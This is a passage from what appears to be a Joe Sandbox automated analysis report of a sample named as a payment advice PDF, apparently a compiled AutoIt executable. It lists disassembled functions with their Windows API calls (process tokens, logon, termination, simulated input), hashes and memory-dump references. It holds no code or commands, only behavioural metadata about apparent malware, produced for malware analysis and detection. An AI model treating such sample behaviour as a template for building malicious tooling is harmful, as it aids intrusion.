                                                              • Opcode Fuzzy Hash: 705ec3c036123187c058d1ca6cd1af67905b4d3187adc81e1c274554015b02cd
                                                              • Instruction Fuzzy Hash: 33418F301047089FDB11DF24C888FAA7BF9FB59764F144639FAA4C71A2C7309885DB62
                                                              Function 008CB69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShowWindow.USER32(009057B0,00000000,01624EE8,?,?,009057B0,?,008CB5A8,?,?), ref: 008CB712
                                                              • EnableWindow.USER32(00000000,00000000), ref: 008CB736
                                                              • ShowWindow.USER32(009057B0,00000000,01624EE8,?,?,009057B0,?,008CB5A8,?,?), ref: 008CB796
                                                              • ShowWindow.USER32(00000000,00000004,?,008CB5A8,?,?), ref: 008CB7A8
                                                              • EnableWindow.USER32(00000000,00000001), ref: 008CB7CC
                                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 008CB7EF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$Enable$MessageSend
                                                              • String ID:
                                                              • API String ID: 642888154-0
                                                              • Opcode ID: 548a84d44cfff4a00a8c2682022b584de93554babd295c5d828a03bfa32a2a62
                                                              • Instruction ID: 15874abdc40c2e0b3a7e746762c10efbcbe8e761a60ba6b7bdb7301adc7c1c4e
                                                              • Opcode Fuzzy Hash: 548a84d44cfff4a00a8c2682022b584de93554babd295c5d828a03bfa32a2a62
                                                              • Instruction Fuzzy Hash: E5411834601644AFDB26CF28C49AF957BB1FB45314F1881A9EE48CF6A2CB31E856CB51
                                                              Function 008B709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,008B4E41,?,?,00000000,00000001), ref: 008B70AC
                                                                • Part of subcall function 008B39A0: GetWindowRect.USER32(?,?), ref: 008B39B3
                                                              • GetDesktopWindow.USER32 ref: 008B70D6
                                                              • GetWindowRect.USER32(00000000), ref: 008B70DD
                                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 008B710F
                                                                • Part of subcall function 008A5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008A52BC
                                                              • GetCursorPos.USER32(?), ref: 008B713B
                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 008B7199
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                              • String ID:
                                                              • API String ID: 4137160315-0
                                                              • Opcode ID: ae2603c159e48998bb86ccfa95938d10729f0c86d819c4e5d74db9e32e26b4f8
                                                              • Instruction ID: c4e769e53a19a03cd41eed7f550195e8b64569c2079e1a48acca1b1086ace616
                                                              • Opcode Fuzzy Hash: ae2603c159e48998bb86ccfa95938d10729f0c86d819c4e5d74db9e32e26b4f8
                                                              • Instruction Fuzzy Hash: A331B472505305ABD720DF18C849F9BB7AAFFC9314F000519F585D7291D770EA09CB92
                                                              Function 00898879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 008980A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008980C0
                                                                • Part of subcall function 008980A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008980CA
                                                                • Part of subcall function 008980A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008980D9
                                                                • Part of subcall function 008980A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008980E0
                                                                • Part of subcall function 008980A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008980F6
                                                              • GetLengthSid.ADVAPI32(?,00000000,0089842F), ref: 008988CA
                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008988D6
                                                              • HeapAlloc.KERNEL32(00000000), ref: 008988DD
                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 008988F6
                                                              • GetProcessHeap.KERNEL32(00000000,00000000,0089842F), ref: 0089890A
                                                              • HeapFree.KERNEL32(00000000), ref: 00898911
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                              • String ID:
                                                              • API String ID: 3008561057-0
                                                              • Opcode ID: 673cb7a15907c3ce5ae323bbaa43308289a838f9cef82558a1cf15aca80695aa
                                                              • Instruction ID: 17f9595761836eaeaf58c9438b51ca45f4015fc8e5ef7e81830b1112152a6d0a
                                                              • Opcode Fuzzy Hash: 673cb7a15907c3ce5ae323bbaa43308289a838f9cef82558a1cf15aca80695aa
                                                              • Instruction Fuzzy Hash: 89119D7160160AEFEF11AFA4DC09FBE7B79FB46315F18402AE946E7211CB329900DB60
                                                              Function 008985B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008985E2
                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 008985E9
                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 008985F8
                                                              • CloseHandle.KERNEL32(00000004), ref: 00898603
                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00898632
                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00898646
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                              • String ID:
                                                              • API String ID: 1413079979-0
                                                              • Opcode ID: a5e447390dff30d2220c7dab27170538ba47ccf24f94b2f94a79fe827f244db0
                                                              • Instruction ID: ed7343a0408c47151aa5c97889aa5f8adebb6f285cb96db88d8b32ff27d90855
                                                              • Opcode Fuzzy Hash: a5e447390dff30d2220c7dab27170538ba47ccf24f94b2f94a79fe827f244db0
                                                              • Instruction Fuzzy Hash: 44114A7250024AEBEF029FA4DD49FDA7BB9FB49304F084065FE05A2161C7719D64DB60
                                                              Function 0089B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0089B7B5
                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0089B7C6
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0089B7CD
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0089B7D5
                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0089B7EC
                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0089B7FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CapsDevice$Release
                                                              • String ID:
                                                              • API String ID: 1035833867-0
                                                              • Opcode ID: 9cc684734bd2eae96dcfc1b2c8d3f9d00a9ac3c74915e57b436ab76ded557a34
                                                              • Instruction ID: e2910268a79f9fbb26f466c753c4b014926f19d83668ae52e1085057b9b551d2
                                                              • Opcode Fuzzy Hash: 9cc684734bd2eae96dcfc1b2c8d3f9d00a9ac3c74915e57b436ab76ded557a34
                                                              • Instruction Fuzzy Hash: 45017175A00209BBEF10ABE69D45E5EBFB9FB48711F044066FA04E7291D6309C00CF91
                                                              Function 00860162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00860193
                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 0086019B
                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008601A6
                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 008601B1
                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 008601B9
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 008601C1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Virtual
                                                              • String ID:
                                                              • API String ID: 4278518827-0
                                                              • Opcode ID: 65a52df6d2eb34ebe2a78b4fe88c75519c02912139119d70425ab734ea6cff67
                                                              • Instruction ID: bf19f4a420a88808a42b6bbd1cfa769d52ae37c4e7c3aab11a9f46077d44d8da
                                                              • Opcode Fuzzy Hash: 65a52df6d2eb34ebe2a78b4fe88c75519c02912139119d70425ab734ea6cff67
                                                              • Instruction Fuzzy Hash: 92016CB09017597DE3008F5A8C85B52FFB8FF19354F00411BA15C47942C7F5A864CBE5
                                                              Function 008A53E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008A53F9
                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 008A540F
                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 008A541E
                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008A542D
                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008A5437
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008A543E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                              • String ID:
                                                              • API String ID: 839392675-0
                                                              • Opcode ID: 371ab7b2955f85c28582b29ce9868e83c7bb1efa56ba0c0738296fea3f6408fc
                                                              • Instruction ID: 13559c67f48f224dece4c7c44ba42dc89b292d386cfde12105a633f61787551f
                                                              • Opcode Fuzzy Hash: 371ab7b2955f85c28582b29ce9868e83c7bb1efa56ba0c0738296fea3f6408fc
                                                              • Instruction Fuzzy Hash: FCF06D72241558BBF3215BA2DC0DEAB7A7DFBCAB11F00016AFA05D105296B11A0186B5
                                                              Function 008A7230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,?), ref: 008A7243
                                                              • EnterCriticalSection.KERNEL32(?,?,00850EE4,?,?), ref: 008A7254
                                                              • TerminateThread.KERNEL32(00000000,000001F6,?,00850EE4,?,?), ref: 008A7261
                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00850EE4,?,?), ref: 008A726E
                                                                • Part of subcall function 008A6C35: CloseHandle.KERNEL32(00000000,?,008A727B,?,00850EE4,?,?), ref: 008A6C3F
                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 008A7281
                                                              • LeaveCriticalSection.KERNEL32(?,?,00850EE4,?,?), ref: 008A7288
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                              • String ID:
                                                              • API String ID: 3495660284-0
                                                              • Opcode ID: 7518e08ad1ec4d22b3b24bfb5feb85da08b993184be40c6e124c0fed6fecd7f5
                                                              • Instruction ID: f956aef7d8c6f240d224289c845f7aa4dfd44ddd627c56d5dea763ee6dd5a43f
                                                              • Opcode Fuzzy Hash: 7518e08ad1ec4d22b3b24bfb5feb85da08b993184be40c6e124c0fed6fecd7f5
                                                              • Instruction Fuzzy Hash: 9EF05E36540612EBF7121B64ED4CEDA773BFF45712B140532F703914A6DB765811DB50
                                                              Function 00898992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0089899D
                                                              • UnloadUserProfile.USERENV(?,?), ref: 008989A9
                                                              • CloseHandle.KERNEL32(?), ref: 008989B2
                                                              • CloseHandle.KERNEL32(?), ref: 008989BA
                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 008989C3
                                                              • HeapFree.KERNEL32(00000000), ref: 008989CA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                              • String ID:
                                                              • API String ID: 146765662-0
                                                              • Opcode ID: cd02521338f3a960ef7c3cd0ad822e49ef86e76094d76e32019a4915a8a9dc05
                                                              • Instruction ID: db511dcc78546455d9254ca85b93bcfdf89667963bf15cb70fb95b6d5a0e56aa
                                                              • Opcode Fuzzy Hash: cd02521338f3a960ef7c3cd0ad822e49ef86e76094d76e32019a4915a8a9dc05
                                                              • Instruction Fuzzy Hash: 57E0C236004401FBEA021FF2EC0CD0ABB7AFB89322B148232F31981171CB329420DB50
                                                              Function 008B85ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 008B8613
                                                              • CharUpperBuffW.USER32(?,?), ref: 008B8722
                                                              • VariantClear.OLEAUT32(?), ref: 008B889A
                                                                • Part of subcall function 008A7562: VariantInit.OLEAUT32(00000000), ref: 008A75A2
                                                                • Part of subcall function 008A7562: VariantCopy.OLEAUT32(00000000,?), ref: 008A75AB
                                                                • Part of subcall function 008A7562: VariantClear.OLEAUT32(00000000), ref: 008A75B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                              • API String ID: 4237274167-1221869570
                                                              • Opcode ID: 60a0820f4e606af09c96633d9999452fb802bda1658d7e92ea4a54146b1d5e2e
                                                              • Instruction ID: f75accf47c7e270a09d54b00622a4611fe7b8c21f8c1bcb56fa67e545f5b5560
                                                              • Opcode Fuzzy Hash: 60a0820f4e606af09c96633d9999452fb802bda1658d7e92ea4a54146b1d5e2e
                                                              • Instruction Fuzzy Hash: 14912670604305DFCB10DF28C48499ABBE8FB89714F14896EF99ACB362DB31E905CB52
                                                              Function 008A2A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0085FC86: _wcscpy.LIBCMT ref: 0085FCA9
                                                              • _memset.LIBCMT ref: 008A2B87
                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008A2BB6
                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008A2C69
                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 008A2C97
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                              • String ID: 0
                                                              • API String ID: 4152858687-4108050209
                                                              • Opcode ID: b3fa16a26db0f7d866a4f525846311eb4a69afef1337f77696b4a8739129136c
                                                              • Instruction ID: 0575c7549065c257c7a85bef8ee84c7ee7909ae289c5e792e02f4ea2f22b905f
                                                              • Opcode Fuzzy Hash: b3fa16a26db0f7d866a4f525846311eb4a69afef1337f77696b4a8739129136c
                                                              • Instruction Fuzzy Hash: F35198716083119FE7349F2CC845A6FB7E9FB9A320F040A29F995D3591DB60CD04CBA2
                                                              Function 0089D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0089D5D4
                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0089D60A
                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0089D61B
                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0089D69D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                              • String ID: DllGetClassObject
                                                              • API String ID: 753597075-1075368562
                                                              • Opcode ID: a7059e9e830869d118edb841a7f9eefbbd9c1913b37a9d746e35785329766bbb
                                                              • Instruction ID: 6e10f2b4a15578f195f32b37d5ca0ac325eb47b46b96efdf71aba7bda977a55c
                                                              • Opcode Fuzzy Hash: a7059e9e830869d118edb841a7f9eefbbd9c1913b37a9d746e35785329766bbb
                                                              • Instruction Fuzzy Hash: 4C416DB1600305EFDF06EF64C884A9A7BB9FF54314B1981AAA909DF206D7B1D944CBE4
                                                              Function 008A2753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 008A27C0
                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 008A27DC
                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 008A2822
                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00905890,00000000), ref: 008A286B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Menu$Delete$InfoItem_memset
                                                              • String ID: 0
                                                              • API String ID: 1173514356-4108050209
                                                              • Opcode ID: 580148f4841de1cdb86b1f7adf063be53ad4e6a3011eee8a74bc32e19eaadbf9
                                                              • Instruction ID: da979408a234ef752d512862d030a83d0f51e74142752ecf4fb5bf355a9b5613
                                                              • Opcode Fuzzy Hash: 580148f4841de1cdb86b1f7adf063be53ad4e6a3011eee8a74bc32e19eaadbf9
                                                              • Instruction Fuzzy Hash: B9418D706043419FEB20DF2CC844B1ABBE9FF86314F14492DF9A5D7692DB34A905CB52
                                                              Function 008BD7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 008BD7C5
                                                                • Part of subcall function 0084784B: _memmove.LIBCMT ref: 00847899
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: BuffCharLower_memmove
                                                              • String ID: cdecl$none$stdcall$winapi
                                                              • API String ID: 3425801089-567219261
                                                              • Opcode ID: 5c9b35f0b18338d53d41984e601c570fa774fd9e0f21959aa7a96e18deec77e1
                                                              • Instruction ID: 2dce55434be28fd3df4abdf2bffd5b3b87f419cde386f7545fa3c2c012c7d977
